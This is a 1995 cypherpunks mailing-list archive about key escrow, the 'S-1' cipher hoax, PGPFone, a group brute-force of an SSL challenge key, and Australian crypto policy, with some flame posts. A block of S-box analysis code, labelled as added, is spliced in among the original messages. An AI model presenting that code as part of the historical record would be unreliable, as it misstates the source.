>        There is no reason for anyone to give up the "master key" to all
>      of their business, when the minimal overhead in storage space for
>      adding an escrowed =session= key will suffice.

More generally, the granularity of the chunk of data protected by each
escrowed key can be varied -- the tradeoff is between the cost of a key
loss and the cost of data storage. A few escrowed master keys are very
cheap to store and very expensive to lose. Each session key is
comparatively worthless on its own, but you could end up having to store an
avalanche of them.  I suspect that something close to session granularity
makes sense in the real world; multi-GB HDs tend to be much cheaper than
asking the NSA to guess your keys for you, etc. Of course, you could also
get into escrowing project keys, dept. keys, etc., ad nauseam.

Choosing session granularity is highly recommended when permitting GAK a la
SB 974 :|

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 10 Aug 95 23:21:36 PDT
To: cypherpunks@toad.com
Subject: Re: This summer's special delivery?
Message-ID: <199508110619.CAA29700@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac4eb0c9030210046e6c@[205.199.118.202]>, tcmay@got.net
(Timothy C. May) wrote:


>I have nothing further to add on this. But recall that it was just about
>this time last year--just before Crypto--that the "alleged RC4 code" was
>posted anonymously to the list.

Do I recall correctly that that RC4 proved to interoperate with the "real" RC4?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCr2PCoZzwIn1bdtAQEUPAF/S1arfdr01B+/o5MlEX6F60NHUL6vgEPQ
sv3264ZCsJAl7TBqqyi1a6baBF7uuTh+
=jhLU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 10 Aug 95 23:40:20 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: This summer's special delivery?
In-Reply-To: <199508110619.CAA29700@bb.hks.net>
Message-ID: <9508110640.AA16646@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:
> Do I recall correctly that that RC4 proved to interoperate with the
> "real" RC4?

Yes.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 10 Aug 95 23:47:42 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <199508110645.CAA29891@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199508110254.TAA02204@netcom14.netcom.com>, vznuri@netcom.com
("Vladimir Z. Nuri") wrote:

>as if PRZ is not already enough of a folk hero....
>BTW, he has been beat by Nautilus, right? Nautilus
>is public domain, right? (I'm thinking of that public
>domain voice encryption released a few mos ago).
>I wonder if he is going to try to put a "spin" on this
>one to differentiate it from the other one. on the 
>other hand, just having his name on it is plenty of
>"spin"...

I can't violate my NDA, but PGPFone will be a *major* revolution for
communication security. I would not be surprised to see several hundred
thousands of users. PGP will pale in comparison.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCr8YioZzwIn1bdtAQH+qQF/bA4povjtixKhIxak+M7aCYmbdMjj9U3r
azryqeapO4A2vYc4qEnP1zLmp83ceMUV
=W9y9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 10 Aug 95 18:15:12 PDT
To: cypherpunks@toad.com
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
Message-ID: <199508110115.DAA17165@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Brad Shantz writes:
 > >I'm tired of Perry. 
 > 
 > <REST DELETED>
 > 
 > I think that any Perry bashing can be taken offline.  I don't think that 700
 > people subscribed to the "I Hate Perry Metzger" list;

Nah, that list is way bigger than cypherpunks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Fri, 11 Aug 95 00:16:38 PDT
To: "L. McCarthy" <lmccarth@cs.umass.edu>
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
In-Reply-To: <9508110100.AA10650@cs.umass.edu>
Message-ID: <Pine.SUN.3.91.950811031534.10223A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, L. McCarthy wrote:

> Date: Thu, 10 Aug 1995 21:00:39 -0400 (EDT)
> From: L. McCarthy <lmccarth@cs.umass.edu>
> To: Cypherpunks Mailing List <cypherpunks@toad.com>
> Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
> 
> Well, for the record, _I_ certainly appreciate .pm's efforts on many fronts
> related to cypherpunks.

As do I.

Certainly he bridges the suit/anarchist gap better than anyone else on 
the list I can think of for the moment.


> 
> Anonymous rants:
> > I know you personally Perry, 
> 
> I doubt it. Prove it to me in *private* email.
> 
> -L. "Futplex" McCarthy   [PGP key available via finger or server]
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Fri, 11 Aug 95 00:19:25 PDT
To: perry@piermont.com
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
In-Reply-To: <199508110337.XAA15986@panix2.panix.com>
Message-ID: <Pine.SUN.3.91.950811031803.10223B-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, Perry E. Metzger wrote:

> Date: Thu, 10 Aug 1995 23:37:48 -0400
> From: Perry E. Metzger <perry@panix.com>
> To: cypherpunks@toad.com
> Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME 
> 
> 
> Anonymous writes:
> > I'm tired of Perry. he's always ranting and stirring the shit.
> 
> I was under the impression Detweiler was legally obligated not to post
> to this mailing list.

Of course it's hard to substantiate who he is when he becomes a tentacle 
himself.

Ah the lovely justice irony serves up like a cold platter of salmon.


> 
> .pm
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 10 Aug 95 19:45:08 PDT
To: cypherpunks@toad.com
Subject: UHS encoding
Message-ID: <199508110245.EAA17947@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


has anyone heard of UHS ? ? it's universal hint system . . it's for game hints
. . its data files are encrypted and a decoder decodes only the hints you
need . . anyone know what encryption is used ? ? it's probably very weak but
a good idea . . i wonder if this is export - restricted too ! !





















--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ford Prefect <remailer@bi-node.zerberus.de>
Date: Thu, 10 Aug 95 20:02:12 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <m0sgkM8-0002AfC@bi-node.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


I think we ought to just throw TIM MAY out of the list. 
let's EXCOMMUNICATE HIM. it's becoming increasingly clear
that he is the source of all our problems. I mean, isn't
it obvious that our progress has stalled? who has written
any code within the last 3 days? if we got rid of him,
it would be EVOLUTION IN ACTION. this is ERIC HUGHES'
mailing list, and eric hughes knows how to write some
decent code. I mean, TCM's signature doesn't even have any
geek code, and he hasn't changed it in 4 years or so,
at least since my last grandparent died (and she was 
considerably more skillful at programming than TCM by
knowing how to make toast).

get rid of all the pricks who continually spout and spew conspiracy
theories. let TCM go and find himself a new mailing list.
that would be a fair comeuppance if he found that he couldn't
learn to do squish because he doesn't have the slightest
clue. he's a leech, a parasite, sucking on the work of
others, pretending that he is at the forefront of our
cause when he is only at the forefront of maniacal egomania.
what has he contributed to the cause? SQUAT. just a lot
of ranting about conspiracy theories and his Stock Pick
of the Week crap. "the web is really growing. people should
focus on it". well, THANK YOU VERY MUCH, MR. BRILLIANT
COMMENTATOR AND VISIONARY, T.C.MAY, I would never
have THOUGHT of that in a zillion years, but now that you
point it out, I GUESS YOU'RE RIGHT.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 11 Aug 95 02:38:42 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Australia, EU crypto ill news, crypto wars
In-Reply-To: <8500.9508110844@exe.dcs.exeter.ac.uk>
Message-ID: <199508110938.FAA07114@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ross Anderson wrote somewhere:
> While at the conference, I found out that a classified meeting
> took place this March in Germany between the signals intelligence
> agencies of the developed countries, plus Australia and South Africa,

Does this imply that neither Australia nor SA has a sigint agency, or that
neither Australia nor SA is a developed country ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 11 Aug 95 03:07:13 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: "Protect the children" as passphrase to Constitution
In-Reply-To: <199508110813.BAA25692@ix9.ix.netcom.com>
Message-ID: <199508111006.GAA12092@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
> Clinton's Executive Order today which limits advertising of cigarettes,
[...]
> (Oh, and one amazing detail: the possible issuance of I.D. cards to all of
> those under the age of 18. Besides being useful for things like curfews,

Can someone offer a citation for this ?

I've tried to find the text of the Executive Order on the net, to no avail. 
http://docs.whitehouse.gov/white-house-publications/1995/08/ has a couple of
short fact sheets on the proposal, and transcripts of a briefing by Sec.
Shalala (DoHHS) and Dir. Kessler (FDA), Clinton's press conference, and his
opening remarks at some discussion with teens about smoking.

I couldn't find anything relevant at http://www.fda.gov/

There's an article in the LA Times (Richter/Cimons) which says:
	The landmark proposal, which could open the door to further curbs
	on tobacco, is expected to include prohibiting cigarettes sales
	to those 18 or younger, enforced by requiring proof of age with
	photo identification.
This sounds to me like a similar approach to the alcohol access protocol.

-Futplex             "Why should I solidify ?" -Sheryl Crow



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Fri, 11 Aug 95 05:57:13 PDT
To: cypherpunks@toad.com
Subject: Re: SSL bruting progress
In-Reply-To: <8377.9508110806@exe.dcs.exeter.ac.uk>
Message-ID: <199508111257.GAA01780@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> We've not managed to isolate the cause of it, as (two people) have
> nearly swept the entire keyspace (heh they had a bit of spare compute)
> and no key has been forthcoming so far.

Um, if you're going to sweep the whole space yourself before you release
the code, what's the point in a public sweep? 

                                    -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 11 Aug 95 04:35:03 PDT
To: cypherpunks@toad.com
Subject: Re: More "S-1" foolishness
In-Reply-To: <199508110353.UAA04743@jobe.shell.portal.com>
Message-ID: <199508111143.HAA23820@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>The other thing I noticed that really makes me question this is that G1
>only uses 4 of its 8 input bits.  As I wrote, it is equivalent to
>parity(i&0x17).  A bit is a terrible thing to waste, and it is hard to
>imagine why it would do this intentionally.  G1 may not be that important
>an element of the cipher but why throw away four bits?
>
>It is possible I suppose that the F and G boxes are not the ones used
>in the "real" version of whatever cipher this is, so this apparent
>weakness and the ones which Matt has pointed out may not be that
>significant.

While I'm loath to make any statement that could be interpreted as
defending this cipher, these are, as you say, only "apparent"
weaknesses.  Other than the "r vs. i" bug, which a very forgiving
observer might attribute to some kind of error (maybe the code was
typed in from a printout; maybe the program was taken from a "working
copy" in the middle of being modified), so far, no one has demonstrated
conclusively that these unorthodox and seemingly unsound design
characteristics actually help the cryptanalyst in this particular
cipher.  I'm talking out of my hat here, but for all we know
carefully selected non-uniformly distributed s-boxes and key
schedules that throw out the odd bit here and there in just the
right way might thwart some killer cryptanalytic technique that
isn't yet known in the civilian world.  Hardly likely, but still
remotely possible.

We can't completely rule this out unless we've seen that the cipher
falls to the various known meta-attacks, like differential and
linear cryptanalysis.  I don't really think this is worth the
trouble, however, given that these techniques can require considerable
effort and skill to apply to an arbitrary cipher and that everything
else about this thing points to a hoax designed to provoke just
such a waste of time.

(Someone will no doubt make me eat my words by doing a rump session
talk at CRYPTO on how interesting the linear and differential
analysis of this cipher turned out to be.)

-matt

PS to whoever posted this thing, if you're reading this: If this
cipher isn't what its comments assert, and you've just added spooky
labels to get people interested in evaluating some design technique
that you've invented because you think no one will take you seriously
if you just come clean, you're wrong.  An intelligently-written
description of your ideas, coupled with an easily-evaluated example,
can get a lot of attention from the crypto community no matter what
the source.  I've personally looked at several such schemes, and
had one of my own (MacGuffin, which you're obviously familiar
with) widely examined by doing just that.  You could have produced
such a description with about as much effort as you've obviously
already gone to in creating the "S-1" code, with far greater
potential rewards.  And if this is just a random hoax, well, I
guess it looks like you've succeeded.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 11 Aug 95 08:46:13 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <ac50c91b000210048e9d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:36 PM 8/11/95, Ray Cromwell wrote:

>  My question is, how portable is it, and does it work over TCP/IP rather
>than just modem connections (I suggested this about a year ago)? My ideal
>implementation would function on the following architectures:
>
>Unix: can be used through either /dev/tty?? or Socket (probably want
>to use UDP). Works on Solaris, IRIX, AIX, NetBSD/FreeBSD/BSDI and Linux.
>(audio devices are all proprietary)
>
>
>Windows: uses Window's sound card device drivers, works via either
>comport or WinSock
>
>Mac: uses Mac sound drivers, uses Mac modem port or MacTCP

From the "MacWeek" article, it initially runs on the Macintosh, using the
sound capabilities built into (nearly) all Macs. Direct modem connections,
with Internet versions to follow. (Windows to follow, too.)

Sound quality with 9600 baud modems said to be pretty good, quality with
14.4 modems said to be very good, and quality with 28.8 modems said to be
better than standard phone quality.

The Mac may be a strange platform to develop on, to many of you, but it has
some advantages. The sound tools are relatively standardized and are even
built into the OS. Developers can thus count on what users will have.

But why the developers actually picked the Mac to do first is something
they can talk about.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 11 Aug 95 01:09:25 PDT
To: admin@dcwill.com
Subject: SSL bruting progress (was: Crypto-relevant flame interruption)
Message-ID: <8377.9508110806@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Fred <admin@dcwill.com> wrote on cpunks:
> Would someone be so kind as to provide a status report on the
> planned SSL attack? Last word was that codework was still underway,
> but I might have missed something relevant to this project amidst
> all of the noise about excessive list noise.

There has been no public announcement.  This is due to a desire to make
real sure it's going to work before announcing.

So, we're working on it.  Software is basically all there, but we're
experiencing difficulties, like during a trial run no key for Hal's
challenge seems to be being found, even though the same software finds
test keys.

We've not managed to isolate the cause of it, as (two people) have
nearly swept the entire keyspace (heh they had a bit of spare compute)
and no key has been forthcoming so far.  Give it a few more days -
until monday - and if no key is found we've got problems, 3 possible
outcomes looming:

a) we find the key to Hal's challenge and go whoopee!  Request a 2nd
   challenge from Hal? and announce a public sweep to see how fast it
   can be done.

b) something is wrong with the interpretation or the gathering of the
   SSL session data Hal based his challenge on (difficult to see
   as there are numerous fixed fields which tally with the SSL spec.)

c) software problems (also difficult to see, the software
   in all cases (3 separate versions) finds the keys of examples
   provided by Andrew Roos (ie he generated a key manually, so we know
   where to start for testing purposes)).

The likelihood of a) happening is receding, as the last key space gets
ticked off.

More news next week.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Fri, 11 Aug 95 06:21:44 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Clinton to resign?
In-Reply-To: <Pine.SOL.3.91.950811012207.19227A-100000@use.usit.net>
Message-ID: <199508111321.JAA28584@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't even see the word "cipher" or "code" in this message, let
alone "NSA" or anything else. Perhaps you misdirected this here when
you intended to mail it to "conspirapunks"?

(More seriously, I really resent having wasted another precious minute
of my life reading this. Please don't do that again. I can't even find
the most tenuous relevance to the list.)

Brad Dolan writes:
> 
> Associated Press reported on August 10, 1995:
>  
> President Won't Resign But...
> 
> (WASHINGTON)
> 
> President Clinton wasn't about to give a serious 
> answer when he was asked Thursday if he might resign. 
> 
> The question came from veteran columnist Sarah McClendon, who asserted 
> that some legislators from the left and right were trying to push him 
> out of office.
> 
> [...]
> 
> "Well, if you promise to run off with me I might," Clinton responded,
> ... "But otherwise, I can't think of any reason." 
> 
> - - - - - - - - - -
> 
> Repeat after me:
> 
> There's nothing to those crazy conspiracy theories.
> There's nothing to those crazy conspiracy theories.....
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Fri, 11 Aug 95 06:28:04 PDT
To: Nesta Stubbs <nesta@wwa.com>
Subject: Re: IPSEC goes to RFC
In-Reply-To: <Pine.BSD.3.91.950811001051.1066E-100000@miso.wwa.com>
Message-ID: <199508111327.JAA01106@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Nesta Stubbs writes:
> There are some other problems too I believe.  I have worked for a decent 
> sized network who did all user authentication at the terminal servers for 
> dial-in accounts thru DNS.  This wasn't too bad for just passws and 
> stuff, but wouldn't this cause some bloat in the nameservers database?  

HESIOD is an excellent demonstration that it works just fine.

> As well as cause problems security wise when it comes to updates.  Would 
> these automatically not be cached in any form by the site making the 
> request?  This also causes a problem for smaller time people who perhaps 
> have a PPP/SLIP connection 24/7 but have nameserve done by their provider, 
> and I for sure don't want my provider to be in control of those keys. 

Why not? After all, they are signed. You can have them held by your
worst enemy and it should be just fine. That's the idea of public key
signatures.


.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 11 Aug 95 06:33:20 PDT
To: mab@crypto.com (Matt Blaze)
Subject: Re: More "S-1" foolishness
In-Reply-To: <199508102043.QAA17280@crypto.com>
Message-ID: <9508111333.AA05740@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:
> 
> Yesterday I mentioned that I'd noticed that "S-1" has a non-uniform
> distribution of F (Sbox?) outputs - some values appear far more often
> than others.  This means that some values are more likely to be XORed
> against the cleartext than others.  Needless to say, this is a very
> unusual (and presumably very bad) property - in DES, for example, the
> Sbox outputs are completely flat.

If it is Skipjack, that would sure explain why they didn't want to
release the source code, eh?  Maybe there was more than one "back door".


-- Jeff
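
[Added example, not part of the original messages and not code from the "S-1" posting.] The two properties raised in this thread, Hal's observation that G1 is equivalent to parity(i&0x17) and so uses only 4 of its 8 input bits, and Matt Blaze's observation that the F outputs are non-uniformly distributed, can both be measured directly from a lookup table. The function names are hypothetical, the skewed table is constructed for illustration because the S-1 F table is not reproduced here, and the linear-sum check goes one step beyond the thread toward the linear cryptanalysis Matt mentions.

```c
#include <stdint.h>
#include <stdio.h>

/* XOR of all bits of an 8-bit value. */
static unsigned parity8(unsigned x)
{
    x ^= x >> 4;
    x ^= x >> 2;
    x ^= x >> 1;
    return x & 1u;
}

/* G1 as characterised in the thread: parity(i & 0x17). */
void build_g1(uint8_t box[256])
{
    for (unsigned i = 0; i < 256; i++)
        box[i] = (uint8_t)parity8(i & 0x17u);
}

/* Constructed 8-bit box with a skewed output distribution (NOT the S-1 F
 * table): outputs 0..15 occur 9 times each, 128..255 never occur. */
void build_skewed(uint8_t box[256])
{
    for (unsigned i = 0; i < 256; i++)
        box[i] = (uint8_t)(i < 128 ? i : (i & 0x0Fu));
}

/* Bit b is set in the result iff flipping input bit b changes the output
 * for at least one input, i.e. the box actually depends on that bit. */
unsigned dependency_mask(const uint8_t box[256])
{
    unsigned mask = 0;
    for (unsigned b = 0; b < 8; b++)
        for (unsigned x = 0; x < 256; x++)
            if (box[x] != box[x ^ (1u << b)]) {
                mask |= 1u << b;
                break;
            }
    return mask;
}

struct dist {
    unsigned distinct;   /* number of output values that occur at all */
    unsigned max_count;  /* occurrences of the most frequent output   */
    double chi2;         /* chi-square statistic against a flat table */
};

/* Histogram the outputs over all 256 inputs; n_outputs is the size of the
 * output alphabet (2 for a one-bit box, 256 for a byte-wide box). */
struct dist distribution(const uint8_t box[256], unsigned n_outputs)
{
    unsigned count[256] = {0};
    struct dist d = {0, 0, 0.0};
    long long sum = 0;

    for (unsigned x = 0; x < 256; x++)
        count[box[x]]++;
    for (unsigned v = 0; v < n_outputs; v++) {
        long long dev = (long long)count[v] * n_outputs - 256;
        sum += dev * dev;
        if (count[v]) d.distinct++;
        if (count[v] > d.max_count) d.max_count = count[v];
    }
    d.chi2 = (double)sum / (256.0 * n_outputs);
    return d;
}

/* Largest |sum over x of (-1)^(a.x XOR out_mask.box[x])| over non-zero
 * input masks a. 256 means an XOR of input bits predicts the selected
 * output bits with certainty; 0 means no linear relation was found. */
int max_linear_sum(const uint8_t box[256], unsigned out_mask, unsigned *best_a)
{
    int best = 0;
    for (unsigned a = 1; a < 256; a++) {
        int s = 0;
        for (unsigned x = 0; x < 256; x++)
            s += (parity8(a & x) ^ parity8(out_mask & box[x])) ? -1 : 1;
        if (s < 0) s = -s;
        if (s > best) { best = s; *best_a = a; }
    }
    return best;
}

int main(void)
{
    uint8_t box[256];
    unsigned a = 0;

    build_g1(box);
    struct dist g = distribution(box, 2);
    int lin = max_linear_sum(box, 1, &a);
    printf("G1: input mask 0x%02X, chi2 %.1f, linear sum %d at 0x%02X\n",
           dependency_mask(box), g.chi2, lin, a);

    build_skewed(box);
    struct dist s = distribution(box, 256);
    printf("skewed: %u distinct outputs, max count %u, chi2 %.1f\n",
           s.distinct, s.max_count, s.chi2);
    return 0;
}
```

G1 comes out perfectly balanced between 0 and 1 even though it ignores half its input, so a flat output histogram alone says nothing about unused input bits; the two checks measure different things.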



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 11 Aug 95 06:36:46 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508110645.CAA29891@bb.hks.net>
Message-ID: <199508111336.JAA05910@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <199508110254.TAA02204@netcom14.netcom.com>, vznuri@netcom.com
> ("Vladimir Z. Nuri") wrote:
> 
> >as if PRZ is not already enough of a folk hero....
> >BTW, he has been beat by Nautilus, right? Nautilus
> >is public domain, right? (I'm thinking of that public
> >domain voice encryption released a few mos ago).
> >I wonder if he is going to try to put a "spin" on this
> >one to differentiate it from the other one. on the 
> >other hand, just having his name on it is plenty of
> >"spin"...
> 
> I can't violate my NDA, but PGPFone will be a *major* revolution for
> communication security. I would not be surprised to see several hundred
> thousands of users. PGP will pale in comparison.

  My question is, how portable is it, and does it work over TCP/IP rather
than just modem connections (I suggested this about a year ago)? My ideal
implementation would function on the following architectures:

Unix: can be used through either /dev/tty?? or Socket (probably want
to use UDP). Works on Solaris, IRIX, AIX, NetBSD/FreeBSD/BSDI and Linux.
(audio devices are all proprietary)


Windows: uses Window's sound card device drivers, works via either 
comport or WinSock 

Mac: uses Mac sound drivers, uses Mac modem port or MacTCP

I'm looking for something that has the look and feel of Internet Phone
(but ported to multiple platforms) with encryption.

-Ray

  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 11 Aug 95 09:37:28 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02120d00ac513fd2f9bc@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:36 8/11/95, Ray Cromwell wrote:

>  My question is, how portable is it, and does it work over TCP/IP rather
>than just modem connections (I suggested this about a year ago)? My ideal
>implementation would function on the following architectures:

I can't comment on the features of PGPFone. However, know that Internet
telephony (as all "real time" services) works over UDP only, not TCP.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 11 Aug 95 01:45:05 PDT
To: cypherpunks@toad.com
Subject: Australia, EU crypto ill news, crypto wars
Message-ID: <8500.9508110844@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Just read this on comp.risks, by Ross Anderson (via a couple of people).

A crypto relevant forward if any is relevant IMO, especially this bit:

Ross Anderson <rja14@cl.cam.ac.uk> writes:
> ... While at the conference, I found out that a classified meeting
> took place this March in Germany between the signals intelligence
> agencies of the developed countries, plus Australia and South Africa,
> at which the assembled spooks agreed to press their governments to
> bring in escrow and/or weak crypto.

You realise, of course, that this means war,

Tactical replies?

a) Lobbying - hopeless IMO, they aren't interested in listening, the
   politicos are just too easy to manipulate and the "masses" aren't
   clueful enough of what crypto means to understand the implications,
   or even notice.

b) pretty good stego - possible technical solution

c) independent states of cyberspace :-)  declaration of independence


c) enforced or "enabled" by b) looks good to me.

Perhaps some literary skilled cpunk would care to compose a suitable
reply for PGN to add to risks.

Adam

----------------------------------------------------------------------
Date: Tue, 1 Aug 1995 20:36:29 -0400 (EDT)
From: "Lance J. Hoffman" <hoffman@seas.gwu.edu>
Subject: Australia next to ban PGP

Date: Tue, 01 Aug 1995 15:29:05 -0400
From: Dave Farber <farber@cis.upenn.edu>
Subject: Australia next to ban PGP [unverified info ...]

From: rja14@cl.cam.ac.uk (Ross Anderson)

Australia's proposed crypto policy:

(1)	Banks will get key escrow
(2)	Other Australian residents will be forced to use weak crypto

Source: talk by Steve Orlowski, Assistant Director, Australian attorney 
general's department, given at the Cryptography Policy and Algorithms 
Conference, Queensland University of Technology, last month.

p 34: `the needs of the majority of users of the infrastructure for
      privacy and smaller financial transactions can be met by lower 
      level encryption which could withstand a normal but not 
      sophisticated attack against it. Law enforcement agencies could 
      develop the capability to mount such sophisticated attacks. 
      Criminals who purchased the higher level encryption products 
      would immediately attract attention to themselves.'

He mentioned that his department considered itself a suitable repository
for the government central decrypting unit, which would decrypt traffic 
for local police forces. He also wants escrowed keys for banks and
other organisations allowed to use strong crypto. 

Centralising the wiretap capability with the AG is represented as a useful
safeguard against abuse of power by local police forces. It would be
presented as a `data recovery' facility in order to reassure the voters.

Centralisation will enable the AG to acquire the capability to use ``more 
sophisticated techniques in circumstances where the key cannot, for 
whatever reason, be recovered from escrow''.

So the technical parameters would appear to be: 40 bit keys for the 
masses, 56-bit escrowed keys for the banks, and a Wiener machine sitting
in Orlowski's office. Belt, braces and string.

Curiously enough, he quotes a `Review of long Term Cost Effectiveness
of Telecommunications Interception' as saying that ``Encryption by 
targets of their communications (both voice and data) is not considered
as a problem for TI at present in Australia'' and goes on to say that
``there has been comparatively little market for voice encryption 
products, although they have been readily available''. 

He even produces some good arguments for the EFF, such as that much of
the intelligence comes from the call log data and from calls to third 
parties such as airlines and hotels which are not encrypted.

He also says that the OECD countries will hold a meeting on National 
Cryptography Policies later this year. While at the conference, I found
out that a classified meeting took place this March in Germany between 
the signals intelligence agencies of the developed countries, plus
Australia and South Africa, at which the assembled spooks agreed to
press their governments to bring in escrow and/or weak crypto.

Australia seems rather eager to lick Uncle Sam's boots on this issue. 
I wonder what the payoff was?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Fri, 11 Aug 95 06:51:35 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
Message-ID: <9508111351.AA04381@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Don Eastlake has actually done a draft RFC on
using the DNS for key distribution.

It may be found at 

ftp://ietf.cnri.reston.va.us/internet-drafts/draft-ietf-dnssec-secext-04.txt

He briefed the W3C security working group about
this recently, and a number of people raised objections, notably

* database bloat
* zone transfer bloat
* increased hits on root servers due to a new class of inquiry.

There was some discussion as to whether these were valid objections,
and the people running prototype code said they had had no problems.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 11 Aug 95 07:01:59 PDT
